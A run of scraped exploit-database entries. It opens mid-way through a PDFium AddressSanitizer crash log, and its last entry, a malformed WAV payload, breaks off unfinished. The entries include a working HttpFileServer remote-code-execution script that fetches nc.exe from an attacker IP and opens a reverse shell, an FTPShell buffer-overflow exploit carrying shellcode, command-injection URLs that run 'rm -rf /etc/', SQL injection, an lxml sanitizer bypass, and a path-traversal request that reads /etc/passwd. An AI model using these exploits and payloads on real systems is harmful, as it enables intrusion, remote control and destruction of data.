    #18 0x4f0af8 in RenderPdf(std::string const&, char const*, unsigned long, Options const&) samples/pdfium_test.cc:531:9
    #19 0x4f16e9 in main samples/pdfium_test.cc:608:5

SUMMARY: AddressSanitizer: heap-buffer-overflow core/src/fpdfapi/fpdf_render/fpdf_render_loadimage.cpp:1479:64 in CPDF_DIBSource::DownSampleScanline32Bit(int, int, unsigned int, unsigned char const*, unsigned char*, int, int, int, int) const
Shadow bytes around the buggy address:
  0x0c307fff9ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fff9eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fff9ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fff9ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c307fff9ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c307fff9ef0: 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa fa
  0x0c307fff9f00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c307fff9f10: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c307fff9f20: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c307fff9f30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c307fff9f40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==28672==ABORTING
--- cut ---

The crash was reported at https://code.google.com/p/chromium/issues/detail?id=554151. Attached are two PDF files which trigger the crash.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39162.zip
HireHackking 
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#	       It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#	       It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
 
#Usage : python Exploit.py <Target IP address> <Target Port Number>

#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!


import urllib2
import sys

try:
	def script_create():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

	def execute_script():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

	def nc_run():
		urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

	ip_addr = "192.168.44.128" #local IP address
	local_port = "443" # Local Port number
	vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
	save= "save|" + vbs
	vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
	exe= "exec|"+vbs2
	vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
	exe1= "exec|"+vbs3
	script_create()
	execute_script()
	nc_run()
except:
	print """[.]Something went wrong..!
	Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
	Don't forgot to change the Local IP address and Port number on the script"""
HireHackking 
# Exploit Title: FTPShell Client 5.24 - Add to Favorites Buffer Overflow
# Google Dork: N/A
# Date: 2015-01-04
# Exploit Author: INSECT.B
#	Twitter : @INSECT.B
#	Facebook : https://www.facebook.com/B.INSECT00
#	Blog : http://binsect00.tistory.com
# Vendor Homepage: www.ftpshell.com
# Software Link: http://www.ftpshell.com/download.htm
# Version: 5.24
# Tested on: Windows7 Ultimate SP1 K x86 
# CVE : N/A

"""
[+] Type : Buffer Overflow
[-]	 ftpsehll client has a buffer overlow entry point in the [Favorites] - [Add to favorites..] 'Session name' input field
[-]	used to add session to favorites list .

[+]Crash : input 'A' x 1500 to Session name field
[-] (4c4.8f8): Access violation - code c0000005 (!!! second chance !!!)
[-] eax=00000000 ebx=00944a0c ecx=00000000 edx=41414141 esi=00000500 edi=0012fe1c
[-] eip=41414141 esp=0012fd54 ebp=41414141 iopl=0         nv up ei pl zr na pe nc
[-] cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
[-] 41414141 ??              ???
"""

import struct

junk = "A"*460
junk2 = "\x90"*248

esp = "\x0B\xD4\xDF\x73" # JMP ESP

#shellcode
#CMD : calc.exe
#encoder : Alpha-mix encoder
#buffer register : esp 
sc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x38\x68" +
"\x4b\x32\x33\x30\x75\x50\x63\x30\x65\x30\x6c\x49\x5a\x45" +
"\x65\x61\x39\x50\x35\x34\x4c\x4b\x46\x30\x54\x70\x4e\x6b" +
"\x63\x62\x46\x6c\x6e\x6b\x43\x62\x47\x64\x4c\x4b\x44\x32" +
"\x46\x48\x74\x4f\x4f\x47\x51\x5a\x37\x56\x35\x61\x59\x6f" +
"\x6e\x4c\x45\x6c\x43\x51\x53\x4c\x43\x32\x44\x6c\x65\x70" +
"\x5a\x61\x5a\x6f\x74\x4d\x37\x71\x6a\x67\x4a\x42\x39\x62" +
"\x76\x32\x42\x77\x6c\x4b\x31\x42\x36\x70\x4e\x6b\x33\x7a" +
"\x57\x4c\x6e\x6b\x32\x6c\x66\x71\x42\x58\x78\x63\x53\x78" +
"\x73\x31\x7a\x71\x36\x31\x4e\x6b\x66\x39\x51\x30\x36\x61" +
"\x59\x43\x6e\x6b\x57\x39\x62\x38\x58\x63\x45\x6a\x52\x69" +
"\x6c\x4b\x44\x74\x4e\x6b\x55\x51\x7a\x76\x70\x31\x69\x6f" +
"\x6c\x6c\x6f\x31\x48\x4f\x36\x6d\x65\x51\x7a\x67\x76\x58" +
"\x59\x70\x61\x65\x48\x76\x53\x33\x71\x6d\x4b\x48\x35\x6b" +
"\x61\x6d\x36\x44\x31\x65\x4b\x54\x30\x58\x6e\x6b\x66\x38" +
"\x76\x44\x56\x61\x4e\x33\x51\x76\x6c\x4b\x74\x4c\x72\x6b" +
"\x6e\x6b\x71\x48\x47\x6c\x57\x71\x7a\x73\x4c\x4b\x66\x64" +
"\x6e\x6b\x36\x61\x6e\x30\x4d\x59\x50\x44\x57\x54\x66\x44" +
"\x63\x6b\x71\x4b\x61\x71\x63\x69\x61\x4a\x36\x31\x39\x6f" +
"\x59\x70\x61\x4f\x61\x4f\x52\x7a\x4c\x4b\x64\x52\x5a\x4b" +
"\x6e\x6d\x31\x4d\x32\x4a\x75\x51\x6c\x4d\x4b\x35\x48\x32" +
"\x75\x50\x65\x50\x67\x70\x66\x30\x73\x58\x65\x61\x4c\x4b" +
"\x52\x4f\x6b\x37\x59\x6f\x48\x55\x4d\x6b\x38\x70\x78\x35" +
"\x59\x32\x33\x66\x72\x48\x79\x36\x5a\x35\x6d\x6d\x4d\x4d" +
"\x6b\x4f\x58\x55\x45\x6c\x33\x36\x61\x6c\x76\x6a\x6b\x30" +
"\x6b\x4b\x4d\x30\x54\x35\x45\x55\x4f\x4b\x62\x67\x37\x63" +
"\x70\x72\x70\x6f\x70\x6a\x45\x50\x46\x33\x69\x6f\x49\x45" +
"\x50\x63\x65\x31\x50\x6c\x71\x73\x46\x4e\x42\x45\x70\x78" +
"\x73\x55\x75\x50\x41\x41"
)



payload = junk + esp + sc + junk2

file=open("C:\\shelll","w")
file.write(payload)
file.close()
HireHackking 
Dear List,

Greetings from vishnu (@dH4wk)

1. Vulnerable Product

   - Advanced Encryption Package
   - Company http://www.aeppro.com/

2. Vulnerability Information

 (A) Buffer OverFlow
     Impact: Attacker gains administrative access
     Remotely Exploitable: No
     Locally Exploitable: Yes


3. Vulnerability Description
     A 1006 byte causes the overflow. It is due to the inefficient/improper
handling of exception. This is an SEH based stack overflow and is
exploitable..

4. Reproduction:
     It can be reproduced by pasting 1006 "A"s or any characters in the
field where the key file is asked during encryption of "*TEXT TO ENCRYPT *"
tab..



*Windbg Output*
==============================================================
(a34.a38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Module load completed but symbols could not be loaded for
image00000000`00400000
image00000000_00400000+0x19c0:
004019c0 f00fc108        lock xadd dword ptr [eax],ecx
ds:002b:4141413d=????????

(a34.a38): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
41414141 ??
==============================================================

Regards,
Vishnu Raju.
HireHackking 
source: https://www.securityfocus.com/bid/67241/info

Puntopy is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

http://www.example.com/novedad.php?id=[SQL Injection]
HireHackking 
source: https://www.securityfocus.com/bid/67215/info

ZamFoo is prone to multiple remote command-execution vulnerabilities.

Remote attackers can exploit these issues to execute arbitrary commands within the context of the vulnerable application to gain root access. This may facilitate a complete compromise of an affected computer.

ZamFoo 12.6 is vulnerable; other versions may also be affected. 

https://www.example.com/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}

https://www.example.com/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=
HireHackking 
source: https://www.securityfocus.com/bid/67159/info

lxml is prone to a security-bypass vulnerability.

An attacker can leverage this issue to bypass security restrictions and perform unauthorized actions. This may aid in further attacks.

Versions prior to lxml 3.3.5 are vulnerable. 

from lxml.html.clean import clean_html

html = '''\
<html>
<body>
<a href="javascript:alert(0)">
aaa</a>
<a href="javas\x01cript:alert(1)">bbb</a>
<a href="javas\x02cript:alert(1)">bbb</a>
<a href="javas\x03cript:alert(1)">bbb</a>
<a href="javas\x04cript:alert(1)">bbb</a>
<a href="javas\x05cript:alert(1)">bbb</a>
<a href="javas\x06cript:alert(1)">bbb</a>
<a href="javas\x07cript:alert(1)">bbb</a>
<a href="javas\x08cript:alert(1)">bbb</a>
<a href="javas\x09cript:alert(1)">bbb</a>
</body>
</html>'''

print clean_html(html)


Output:

<div>
<body>
<a href="">aaa</a>
<a href="javascript:alert(1)">
bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="javascript:alert(1)">bbb</a>
<a href="">bbb</a>
</body>
</div>
HireHackking 
source: https://www.securityfocus.com/bid/67033/info

Comtrend CT-5361T ADSL Router is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible.

Comtrend CT-5361T firmware version A111-312SSG-T02_R01 is vulnerable; other versions may also be affected. 

http://www.example.com/password.cgi?sysPassword=[Your Password]
HireHackking 
Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall
Author : Ahmed Sultan (0x4148)
Email : 0x4148@gmail.com

MediaAccess TG788vn with Cisco firewall http config is vulnerable to
critical unauthenticated file disclosure flaw,

POC

Request:
POST /scgi-bin/platform.cgi HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00

Response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2011 00:00:45 GMT
Server: Embedded HTTP Server.
Connection: close

loic_ipsec:x:500:500:xauth:/:/bin/cli

the http server is running with root privileges , which mean that the
attacker might escalate the exploit for further critical attacks
HireHackking 
source: https://www.securityfocus.com/bid/67436/info

ALLPlayer is prone to a memory-corruption vulnerability.

An attacker can leverage this issue to crash the affected application, causing a denial-of-service condition. Due to the nature of this issue, arbitrary code execution may be possible but this has not been confirmed.

ALLPlayer 5.9 is vulnerable; other versions may also be affected. 

data
="\x52\x49\x46\x46\xE4\x0D\x0A\x09\x00\x57\x41\x56\x45\x66\x6D\x74\x20\x10\x00\x00\x00\x01\x00\x02\x00\x44\xAC\x00\x00\x10\xB1\x02\x00\x04\x00\x10\x00\x64\x61\x74\x61\xC0\x0D\x0A\x09\x00\x01\x00\x01\x00\x00\x00\x01\x00\x01\x00\x04\x00\x00\x00\x05\x00\x02\x00\x08\x00\x02\x00\x09\x00\x01\x00\x0D\x0A\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x4